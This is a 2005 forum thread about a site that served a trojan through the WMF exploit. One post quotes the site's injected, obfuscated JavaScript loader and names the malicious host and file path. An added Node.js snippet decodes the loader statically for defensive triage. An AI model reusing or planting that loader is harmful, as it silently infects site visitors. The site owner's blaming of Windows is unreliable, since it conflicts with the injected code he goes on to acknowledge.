to Dear Cucciolo


<:8_)~
12-29-2005, 8:31 AM
please check~~

I got that... on the first page

Sorry about that and please do something, I check every day!
or
Symantec is too stupid


:D :D :D

pascal_martinfr
12-29-2005, 9:18 AM
I've got the same problem with my AVG anti-virus

Hauser
12-29-2005, 10:54 AM
It's the Exdown Trojan! (avast)

When loading the page a file called xpl.wmf
coming from http://best-voyeur.info will be loaded.
(exact place: http://best-voyeur.info/ntraf/xpl.wmf)

It seems it uses an exploit that allows code to be
executed inside a wmv-file.

Update: http://www.f-secure.com/weblog/archives/archive-122005.html#00000752

http://isc.sans.org/diary.php?storyid=972

<:8_)~
12-29-2005, 6:18 PM
Should we write an email directly to him?
:( :( :( :( :( :( :( :(

Carlo31
12-29-2005, 7:13 PM
Thanks for the information guys.
I have just seen your message, and I was quite surprised because we didn't get any e-mail from other people regarding this problem.

Actually, it looks like if there was a problem, it has been solved now, or at least we can't detect any problem of the kind you have just described on our side.
Please let me know if some of you still get the same thing.


Thanks for the tip

Carlo

Backwalk
12-30-2005, 1:58 AM
Sorry, man,
Still getting the warning about the Trojan.
I sent an e-mail last night. I guess you didn't get it, or I sent it to the wrong mailbox.
Just letting you know.
Regards,
BW

Hauser
12-30-2005, 3:29 AM
Originally posted by Carlo31
Thanks for the information guys.
I have just seen your message, and I was quite surprised because we didn't get any e-mail from other people regarding this problem.

Actually, it looks like if there was a problem, it has been solved now, or at least we can't detect any problem of the kind you have just described on our side.
Please let me know if some of you still get the same thing.


Thanks for the tip

Carlo

Dear Carlo,

Your start page contains these lines of code:

<script language="JavaScript">
e = '0x00' + '6E';str1 = "%D5%8D%86%9B%F1%9C%9D%96%85%8A%D2%CF%9B%86%9C%86%8F%86%85%86%9D%96%D7%89%86%8D%8D%8A%83%CF%D3%D5%86%8B%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D%9D%81%D7%C0%C0%8F%8A%9C%9D%C2%9B%80%96%8A%9A%9F%C3%86%83%8B%80%C0%83%9D%9F%8E%8B%C0%CF%F1%98%86%8D%9D%89%D2%DE%F1%89%8A%86%88%89%9D%D2%DE%D3%D5%C0%86%8B%9F%8E%82%8A%D3%D5%C0%8D%86%9B%D3%F1%E2%E7";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script>


This loads the Trojan from the best-voyeur.info site

Hauser
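
Added example (not part of Hauser's post or of the site's code): a Node.js decoder that recovers what the quoted script writes into the page without executing it, then lists any injected iframes and how they are concealed. The function names `decodeBlob` and `triage` and the host `site.example` are assumptions made for illustration.

```javascript
// Static triage of the XOR + %XX loader quoted above: decode as data, never eval.
// Blob copied from the quoted script, with forum-inserted spaces removed.
const PAGE_BLOB =
  "%D5%8D%86%9B%F1%9C%9D%96%85%8A%D2%CF%9B%86%9C%86%8F%86%85%86%9D%96%D7%89" +
  "%86%8D%8D%8A%83%CF%D3%D5%86%8B%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D%9D%81" +
  "%D7%C0%C0%8F%8A%9C%9D%C2%9B%80%96%8A%9A%9F%C3%86%83%8B%80%C0%83%9D%9F%8E" +
  "%8B%C0%CF%F1%98%86%8D%9D%89%D2%DE%F1%89%8A%86%88%89%9D%D2%DE%D3%D5%C0%86" +
  "%8B%9F%8E%82%8A%D3%D5%C0%8D%86%9B%D3%F1%E2%E7";

// Key and offset as used by the quoted script: e = 0x6E, then "- 127".
function decodeBlob(blob, key = 0x6e, offset = 127) {
  // Tolerate whitespace that forum or mail software inserts into long strings.
  const cleaned = blob.replace(/\s+/g, "");
  if (!/^(%[0-9A-Fa-f]{2})+$/.test(cleaned)) {
    throw new Error("blob is not a pure %XX sequence");
  }
  let out = "";
  for (let i = 0; i < cleaned.length; i += 3) {
    const byte = parseInt(cleaned.slice(i + 1, i + 3), 16);
    out += String.fromCharCode((byte ^ key) - offset);
  }
  return out;
}

// Report each injected frame: source, host, and the usual concealment markers.
function triage(decoded, ownHost) {
  const findings = [];
  const frameRe = /<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)[^>]*>/gi;
  let m;
  while ((m = frameRe.exec(decoded)) !== null) {
    let host = null;
    try { host = new URL(m[1]).hostname; } catch (_) { /* relative or malformed src */ }
    findings.push({
      src: m[1],
      host,
      external: host !== null && host !== ownHost,
      tiny: /\bwidth\s*=\s*["']?[01]\b/i.test(m[0]) && /\bheight\s*=\s*["']?[01]\b/i.test(m[0]),
      hiddenWrapper: /visibility\s*:\s*hidden|display\s*:\s*none/i.test(decoded.slice(0, m.index)),
    });
  }
  return findings;
}

// "site.example" is a placeholder for the affected site's own hostname.
const decoded = decodeBlob(PAGE_BLOB);
console.log(JSON.stringify(decoded));
console.log(triage(decoded, "site.example"));
```

The decoded markup is a hidden `<div>` wrapping a 1x1 iframe, so a site owner searching page templates for the plain-text domain would not find it; searching for the `unescape`/`fromCharCode`/`document.write` combination does.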

Carlo31
12-30-2005, 4:19 AM
OK, now I see what you mean... I got the same problem now.

You must know that it is not a problem coming from our site, but it's a system failure of Windows.

I think we have solved the problem now (thanks a lot to Hauser for the tip).

Again, if the problem comes back, please let me know.

antilop
12-30-2005, 4:37 AM
Yes Carlo,
right now I don't have any problem in any of your
pages... everything is running smoothly on my side

Thanks

antilop